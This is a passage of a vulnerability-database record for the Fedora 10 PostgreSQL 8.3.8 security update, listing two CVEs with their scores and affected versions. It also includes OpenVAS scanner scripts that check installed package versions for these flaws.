{"id": "FEDORA:0B1CE10F85E", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 10 Update: postgresql-8.3.8-1.fc10", "description": "PostgreSQL is an advanced Object-Relational database management system (DBMS) that supports almost all SQL constructs (including transactions, subselects and user-defined types and functions). The postgresql package includes the client programs and libraries that you'll need to access a PostgreSQL DBMS server. These PostgreSQL client programs are programs that directly manipulate the internal structure of PostgreSQL databases on a PostgreSQL server. These client programs can be located on the same machine with the PostgreSQL server, or may be on a remote machine which accesses a PostgreSQL server over a network connection. This package contains the docs in HTML for the whole package, as well as command-line utilities for managing PostgreSQL databases on a PostgreSQL server. If you want to manipulate a PostgreSQL database on a remote PostgreSQL server, you need this package. You also need to install this package if you're installing the postgresql-server package. ", "published": "2009-09-11T23:21:46", "modified": "2009-09-11T23:21:46", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2007-6600", "CVE-2009-0922"], "lastseen": "2020-12-21T08:17:49", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0922", "CVE-2007-6600"]}, {"type": "postgresql", "idList": ["POSTGRESQL:CVE-2007-6600", "POSTGRESQL:CVE-2009-0922"]}, {"type": "openvas", "idList": ["OPENVAS:65729", "OPENVAS:65757", "OPENVAS:136141256231064851", "OPENVAS:136141256231065757", "OPENVAS:880949", "OPENVAS:136141256231065729", "OPENVAS:1361412562310880695", "OPENVAS:1361412562310900480", "OPENVAS:880695", "OPENVAS:64851"]}, {"type": "redhat", "idList": ["RHSA-2008:0039", "RHSA-2009:1485", "RHSA-2009:1484"]}, {"type": "centos", "idList": ["CESA-2009:1484", "CESA-2008:0039", "CESA-2009:1485"]}, {"type": "nessus", "idList": ["UBUNTU_USN-753-1.NASL", "SUSE9_12383.NASL", "SUSE_11_0_POSTGRESQL-090324.NASL", "SUSE_POSTGRESQL-6114.NASL", "ORACLELINUX_ELSA-2009-1484.NASL", "REDHAT-RHSA-2009-1484.NASL", "CENTOS_RHSA-2009-1484.NASL", "SUSE_11_1_POSTGRESQL-090324.NASL", "FEDORA_2009-2927.NASL", "SL_20091007_POSTGRESQL_ON_SL3_X.NASL"]}, {"type": "fedora", "idList": ["FEDORA:8EFE610F87A", "FEDORA:3918B208514", "FEDORA:B5ECF208609"]}, {"type": "ubuntu", "idList": ["USN-753-1", "USN-834-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22490", "SECURITYVULNS:VULN:9765", "SECURITYVULNS:DOC:21510", "SECURITYVULNS:DOC:22944"]}, {"type": "seebug", "idList": ["SSV:4928"]}, {"type": "exploitdb", "idList": ["EDB-ID:32849"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0039", "ELSA-2009-1484"]}], "modified": "2020-12-21T08:17:49", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2020-12-21T08:17:49", "rev": 2}, "vulnersScore": 6.0}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "10", "arch": "any", "packageName": "postgresql", "packageVersion": "8.3.8", "packageFilename": "UNKNOWN", "operator": "lt"}]}

{"cve": [{"lastseen": "2020-10-03T11:45:55", "description": "PostgreSQL 8.2 before 8.2.6, 8.1 before 8.1.11, 8.0 before 8.0.15, 7.4 before 7.4.19, and 7.3 before 7.3.21 uses superuser privileges instead of table owner privileges for (1) VACUUM and (2) ANALYZE operations within index functions, and supports (3) SET ROLE and (4) SET SESSION AUTHORIZATION within index functions, which allows remote authenticated users to gain privileges.", "edition": 3, "cvss3": {}, "published": "2008-01-09T21:46:00", "title": "CVE-2007-6600", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-6600"], "modified": "2018-10-15T21:55:00", "cpe": ["cpe:/a:postgresql:postgresql:7.3.8", "cpe:/a:postgresql:postgresql:7.4", "cpe:/a:postgresql:postgresql:7.4.6", "cpe:/a:postgresql:postgresql:7.3.7", "cpe:/a:postgresql:postgresql:8.0.3", "cpe:/a:postgresql:postgresql:7.4.10", "cpe:/a:postgresql:postgresql:8.2.4", "cpe:/a:postgresql:postgresql:8.1.7", "cpe:/a:postgresql:postgresql:8.2", "cpe:/a:postgresql:postgresql:8.0.1", "cpe:/a:postgresql:postgresql:8.0.4", "cpe:/a:postgresql:postgresql:8.0.7", "cpe:/a:postgresql:postgresql:8.1.8", "cpe:/a:postgresql:postgresql:8.2.2", "cpe:/a:postgresql:postgresql:8.2.3", "cpe:/a:postgresql:postgresql:7.3.9", "cpe:/a:postgresql:postgresql:7.3.5", "cpe:/a:postgresql:postgresql:8.2.1", "cpe:/a:postgresql:postgresql:8.0.10", "cpe:/a:postgresql:postgresql:8.0.14", "cpe:/a:postgresql:postgresql:7.3.19", "cpe:/a:postgresql:postgresql:8.0.13", "cpe:/a:postgresql:postgresql:7.4.2", "cpe:/a:postgresql:postgresql:8.2.5", "cpe:/a:postgresql:postgresql:8.1.10", "cpe:/a:postgresql:postgresql:7.4.9", "cpe:/a:postgresql:postgresql:7.3.4", "cpe:/a:postgresql:postgresql:8.0.2", "cpe:/a:postgresql:postgresql:7.3.3", "cpe:/a:postgresql:postgresql:7.3.10", "cpe:/a:postgresql:postgresql:7.3.13", "cpe:/a:postgresql:postgresql:8.1.1", "cpe:/a:postgresql:postgresql:7.3.16", "cpe:/a:postgresql:postgresql:7.4.1", "cpe:/a:postgresql:postgresql:7.4.13", "cpe:/a:postgresql:postgresql:8.1.4", "cpe:/a:postgresql:postgresql:7.3.14", "cpe:/a:postgresql:postgresql:8.0", "cpe:/a:postgresql:postgresql:8.1.5", "cpe:/a:postgresql:postgresql:8.1.6", "cpe:/a:postgresql:postgresql:7.3.11", "cpe:/a:postgresql:postgresql:7.4.7", "cpe:/a:postgresql:postgresql:7.4.18", "cpe:/a:postgresql:postgresql:7.4.4", "cpe:/a:postgresql:postgresql:8.1.9", "cpe:/a:postgresql:postgresql:8.0.12", "cpe:/a:postgresql:postgresql:7.4.17", "cpe:/a:postgresql:postgresql:7.3.17", "cpe:/a:postgresql:postgresql:7.4.12", "cpe:/a:postgresql:postgresql:8.0.8", "cpe:/a:postgresql:postgresql:7.3.12", "cpe:/a:postgresql:postgresql:8.0.5", "cpe:/a:postgresql:postgresql:8.0.6", "cpe:/a:postgresql:postgresql:7.3.15", "cpe:/a:postgresql:postgresql:7.3.2", "cpe:/a:postgresql:postgresql:8.1.2", "cpe:/a:postgresql:postgresql:7.3", "cpe:/a:postgresql:postgresql:7.4.16", "cpe:/a:postgresql:postgresql:7.4.5", "cpe:/a:postgresql:postgresql:7.4.8", "cpe:/a:postgresql:postgresql:7.3.1", "cpe:/a:postgresql:postgresql:8.1.3", "cpe:/a:postgresql:postgresql:7.4.3", "cpe:/a:postgresql:postgresql:7.4.11", "cpe:/a:postgresql:postgresql:8.0.0", "cpe:/a:postgresql:postgresql:7.4.14", "cpe:/a:postgresql:postgresql:8.0.9", "cpe:/a:postgresql:postgresql:8.0.11", "cpe:/a:postgresql:postgresql:7.3.18", "cpe:/a:postgresql:postgresql:7.3.6"], "id": "CVE-2007-6600", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6600", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:postgresql:postgresql:7.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.18:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.18:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.13:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.17:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.3.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:54:12", "description": "PostgreSQL before 8.3.7, 8.2.13, 8.1.17, 8.0.21, and 7.4.25 allows remote authenticated users to cause a denial of service (stack consumption and crash) by triggering a failure in the conversion of a localized error message to a client-specified encoding, as demonstrated using mismatched encoding conversion requests.\nPer: https://bugzilla.redhat.com/show_bug.cgi?id=488156\r\n\r\n\"PostgreSQL allows remote authenticated users to cause a momentary denial\r\nof service (crash due to stack consumption) when there is a failure to\r\nconvert a localized error message to the client-specified encoding.\r\nIn releases 8.3.6, 8.2.12, 8.1.16. 8.0.20, and 7.4.24, a trivial\r\nmisconfiguration is sufficient to provoke a crash. In older releases\r\nit is necessary to select a locale and client encoding for which\r\nspecific messages fail to translate, and so a given installation may or\r\nmay not be vulnerable depending on the administrator-determined locale\r\nsetting.\r\n\r\nReleases 8.3.7, 8.2.13, 8.1.17, 8.0.21, and 7.4.25 are secure against\r\nall known variants of this issue.\"", "edition": 3, "cvss3": {}, "published": "2009-03-17T17:30:00", "title": "CVE-2009-0922", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0922"], "modified": "2018-10-10T19:32:00", "cpe": ["cpe:/a:postgresql:postgresql:8.3.6", "cpe:/a:postgresql:postgresql:8.1.16", "cpe:/a:postgresql:postgresql:8.2.12", "cpe:/a:postgresql:postgresql:8.0.20", "cpe:/a:postgresql:postgresql:7.4.24"], "id": "CVE-2009-0922", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0922", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:postgresql:postgresql:8.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:7.4.24:*:*:*:*:*:*:*"]}], "postgresql": [{"lastseen": "2020-12-24T14:27:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-6600"], "description": "Two vulnerabilities in how ANALYZE executes user defined functions that are part of expression indexes allows users to gain superuser privileges. A valid login that has permissions to create functions and tables is required to exploit this vulnearbility.", "edition": 3, "modified": "2008-01-09T21:46:00", "published": "2008-01-09T21:46:00", "href": "https://www.postgresql.org/support/security/8.2/", "id": "POSTGRESQL:CVE-2007-6600", "type": "postgresql", "title": "Vulnerability in core server (CVE-2007-6600)", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T14:27:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-0922"], "description": "It is possible to cause a momentary denial of service when there is a failure to convert a localized error message to the client-specified encoding. A valid login is required to exploit this vulnerability.", "edition": 3, "modified": "2009-03-17T17:30:00", "published": "2009-03-17T17:30:00", "href": "https://www.postgresql.org/support/security/8.3/", "id": "POSTGRESQL:CVE-2009-0922", "type": "postgresql", "title": "Vulnerability in core server (CVE-2009-0922)", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2020-01-29T20:43:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0922"], "description": "This host is installed with PostgreSQL Server and is prone to\n denial of service vulnerabilities.", "modified": "2020-01-28T00:00:00", "published": "2009-03-26T00:00:00", "id": "OPENVAS:1361412562310900480", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900480", "type": "openvas", "title": "PostgreSQL 'CVE-2009-0922' Denial of Service Vulnerability (Linux)", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# PostgreSQL Denial of Service Vulnerability (Linux)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:postgresql:postgresql\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900480\");\n script_version(\"2020-01-28T13:26:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-28 13:26:39 +0000 (Tue, 28 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-03-26 11:19:12 +0100 (Thu, 26 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2009-0922\");\n script_bugtraq_id(34090);\n script_name(\"PostgreSQL 'CVE-2009-0922' Denial of Service Vulnerability (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"postgresql_detect.nasl\", \"secpod_postgresql_detect_lin.nasl\", \"secpod_postgresql_detect_win.nasl\");\n script_mandatory_keys(\"postgresql/detected\");\n\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=488156\");\n script_xref(name:\"URL\", value:\"http://archives.postgresql.org/pgsql-bugs/2009-02/msg00172.php\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker cause stack consumption or\n denial of service through mismatched encoding conversion requests.\");\n\n script_tag(name:\"affected\", value:\"PostgreSQL versions before 8.3.7, 8.2.13, 8.1.17, 8.0.21, and 7.4.25\");\n\n script_tag(name:\"insight\", value:\"This flaw is due to failure in converting a localized error message to the\n client-specified encoding.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to respective version below,\n PostgreSQL 8.3.7 or 8.2.13 or 8.1.17 or 8.0.21 or 7.4.25.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PostgreSQL Server and is prone to\n denial of service vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif(version_in_range(version:version, test_version:\"8.3\", test_version2:\"8.3.6\") ||\n version_in_range(version:version, test_version:\"8.2\", test_version2:\"8.2.12\") ||\n version_in_range(version:version, test_version:\"8.1\", test_version2:\"8.1.16\") ||\n version_in_range(version:version, test_version:\"8.0\", test_version2:\"8.0.20\") ||\n version_in_range(version:version, test_version:\"7.4\", test_version2:\"7.4.24\")) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"8.3.7/8.2.13/8.1.17/8.0.21/7.4.25\", install_path:location);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2018-04-06T11:38:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922"], "description": "The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-9474.", "modified": "2018-04-06T00:00:00", "published": "2009-09-15T00:00:00", "id": "OPENVAS:136141256231064851", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064851", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-9474 (postgresql)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_9474.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-9474 (postgresql)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to PostgreSQL 8.3.8, for various fixes described at\nhttp://www.postgresql.org/docs/8.3/static/release-8-3-8.html\nincluding three security issues\n\nChangeLog:\n\n* Wed Sep 9 2009 Tom Lane 8.3.8-1\n- Update to PostgreSQL 8.3.8, for various fixes described at\nhttp://www.postgresql.org/docs/8.3/static/release-8-3-8.html\nincluding three security issues\nRelated: #522084\nRelated: #522085\nRelated: #522092\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update postgresql' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-9474\";\ntag_summary = \"The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-9474.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64851\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-15 22:46:32 +0200 (Tue, 15 Sep 2009)\");\n script_cve_id(\"CVE-2009-0922\", \"CVE-2007-6600\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Core 10 FEDORA-2009-9474 (postgresql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=522084\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=522085\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=522092\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plperl\", rpm:\"postgresql-plperl~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plpython\", rpm:\"postgresql-plpython~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pltcl\", rpm:\"postgresql-pltcl~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922"], "description": "The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-9474.", "modified": "2017-07-10T00:00:00", "published": "2009-09-15T00:00:00", "id": "OPENVAS:64851", "href": "http://plugins.openvas.org/nasl.php?oid=64851", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-9474 (postgresql)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_9474.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-9474 (postgresql)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to PostgreSQL 8.3.8, for various fixes described at\nhttp://www.postgresql.org/docs/8.3/static/release-8-3-8.html\nincluding three security issues\n\nChangeLog:\n\n* Wed Sep 9 2009 Tom Lane 8.3.8-1\n- Update to PostgreSQL 8.3.8, for various fixes described 